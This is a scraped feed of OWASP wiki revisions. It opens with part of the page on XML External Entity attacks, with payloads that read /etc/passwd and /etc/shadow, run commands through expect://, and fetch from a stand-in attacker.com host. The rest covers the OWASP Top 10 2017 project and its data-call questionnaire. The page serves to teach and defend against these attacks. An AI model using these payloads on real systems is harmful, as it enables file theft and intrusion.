Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests or launching a [[CSRF]] attack to any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.&lt;br /&gt;
&lt;br /&gt;
Note that the application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosures. An attacker can leverage DNS information to exfiltrate data through subdomain names to a DNS server that he/she controls.&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
* The application parses XML documents.&lt;br /&gt;
* Tainted data is allowed within the system identifier portion of the entity, within the [http://www.w3.org/TR/REC-xml/#sec-prolog-dtd document type declaration] (DTD).&lt;br /&gt;
* The XML processor is configured to validate and process the DTD.&lt;br /&gt;
* The XML processor is configured to resolve external entities within the DTD.&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
The examples below are from [[Testing for XML Injection (OWASP-DV-008)]].&lt;br /&gt;
&lt;br /&gt;
===Accessing a local resource that may not return===&lt;br /&gt;
&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
  &amp;lt;!DOCTYPE foo [  &lt;br /&gt;
   &amp;lt;!ELEMENT foo ANY &amp;gt;&lt;br /&gt;
   &amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
==Remote Code Execution==&lt;br /&gt;
 &lt;br /&gt;
If fortune is on our side, and the PHP &amp;quot;expect&amp;quot; module is loaded, we can get RCE. Let’s modify the payload&lt;br /&gt;
&lt;br /&gt;
 '''&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;'''&lt;br /&gt;
 ''' &amp;lt;!DOCTYPE foo [ &amp;lt;!ELEMENT foo ANY &amp;gt;'''&lt;br /&gt;
 '''   &amp;lt;!ENTITY xxe SYSTEM &amp;quot;expect://id&amp;quot; &amp;gt;]&amp;gt;'''&lt;br /&gt;
  '''   &amp;lt;creds&amp;gt;'''&lt;br /&gt;
  '''      &amp;lt;user&amp;gt;&amp;amp;xxe;&amp;lt;/user&amp;gt;'''&lt;br /&gt;
  '''      &amp;lt;pass&amp;gt;mypass&amp;lt;/pass&amp;gt;'''&lt;br /&gt;
  '''   &amp;lt;/creds&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
===Disclosing /etc/passwd or other targeted files===&lt;br /&gt;
&lt;br /&gt;
 ''' &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
  &amp;lt;!DOCTYPE foo [  &lt;br /&gt;
    &amp;lt;!ELEMENT foo ANY &amp;gt;&lt;br /&gt;
    &amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
  &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
  &amp;lt;!DOCTYPE foo [  &lt;br /&gt;
    &amp;lt;!ELEMENT foo ANY &amp;gt;&lt;br /&gt;
    &amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
  &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
  &amp;lt;!DOCTYPE foo [  &lt;br /&gt;
    &amp;lt;!ELEMENT foo ANY &amp;gt;&lt;br /&gt;
    &amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///c:/boot.ini&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
  &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
  &amp;lt;!DOCTYPE foo [  &lt;br /&gt;
    &amp;lt;!ELEMENT foo ANY &amp;gt;&lt;br /&gt;
    &amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;lt;nowiki&amp;gt;http://www.attacker.com/text.txt&amp;lt;/nowiki&amp;gt;&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[SQL Injection]]&lt;br /&gt;
* [[Blind SQL Injection]]&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Missing XML Validation]]&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
Since the whole XML document is communicated from an untrusted client, it's not usually possible to selectively [[Input Validation|validate]] or escape tainted data within the system identifier in the DTD. Therefore, the XML processor should be configured to use a local static DTD and disallow any declared DTD included in the XML document.&lt;br /&gt;
&lt;br /&gt;
Detailed guidance on how to disable XXE processing, or otherwise defend against XXE attacks is presented in the [[XML External Entity (XXE) Prevention Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
* OWASP [[XML External Entity (XXE) Prevention Cheat Sheet]]&lt;br /&gt;
* [http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf Timothy Morgan's 2014 Paper: XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques]&lt;br /&gt;
* [http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf Precursor presentation of above paper - at OWASP AppSec USA 2013]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/611.html CWE-611: Information Exposure Through XML External Entity Reference]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/827.html CWE-827: Improper Control of Document Type Definition]&lt;br /&gt;
* [https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf Sascha Herzog's Presentation on XML External Entity Attacks - at OWASP AppSec Germany 2010]&lt;br /&gt;
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489 PostgreSQL XXE vulnerability]&lt;br /&gt;
* [http://www.agarri.fr/kom/archives/2011/09/15/failles_de_type_xee_dans_sharepoint_et_dotnetnuke/index.html SharePoint and DotNetNuke XXE Vulnerabilities, in French]&lt;br /&gt;
* [http://msdn.microsoft.com/en-us/magazine/ee335713.aspx XML Denial of Service Attacks and Defenses (in .NET)]&lt;br /&gt;
* [http://www.securityfocus.com/archive/1/297714/2002-10-27/2002-11-02/0 Early (2002) BugTraq Article on XXE]&lt;br /&gt;
&lt;br /&gt;
[[Category:API_Abuse]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User_talk:Eelgheez&amp;diff=233945</id>
		<title>User talk:Eelgheez</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User_talk:Eelgheez&amp;diff=233945"/>
				<updated>2017-10-01T18:27:09Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Welcome to ''OWASP''!'''&lt;br /&gt;
We hope you will contribute much and well.&lt;br /&gt;
You will probably want to read the [https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents help pages].&lt;br /&gt;
Again, welcome and have fun! [[User:KateHartmann|KateHartmann]] ([[User talk:KateHartmann|talk]]) 06:39, 27 April 2016 (CDT)&lt;br /&gt;
:: Thanks, Kate. --[[User:Eelgheez|Eelgheez]] ([[User talk:Eelgheez|talk]]) 13:50, 28 April 2016 (CDT)&lt;br /&gt;
&lt;br /&gt;
== OWASP Top-10 2017==&lt;br /&gt;
Eelgheez - Based on [https://www.owasp.org/index.php?title=Top_10_2017-A3-Cross-Site_Scripting_%28XSS%29&amp;amp;type=revision&amp;amp;diff=230186&amp;amp;oldid=229058 changes you made] to the 2017 A3, we created [https://github.com/OWASP/Top10/issues/59 this GitHub issue]. I've made many, but not all of the changes that you selected. If you have further comments, please [mailto:neil.smithline@owasp.org let me know directly] or create a new GitHub issue. Thanks! --[[User:Neil_Smithline|Neil Smithline]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=233936</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=233936"/>
				<updated>2017-09-30T20:16:52Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
* All industry professionals are encouraged to complete this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 has been reopened. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now reopened to allow for additional data to be collected for analysis. The new deadline for the extended data call is &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
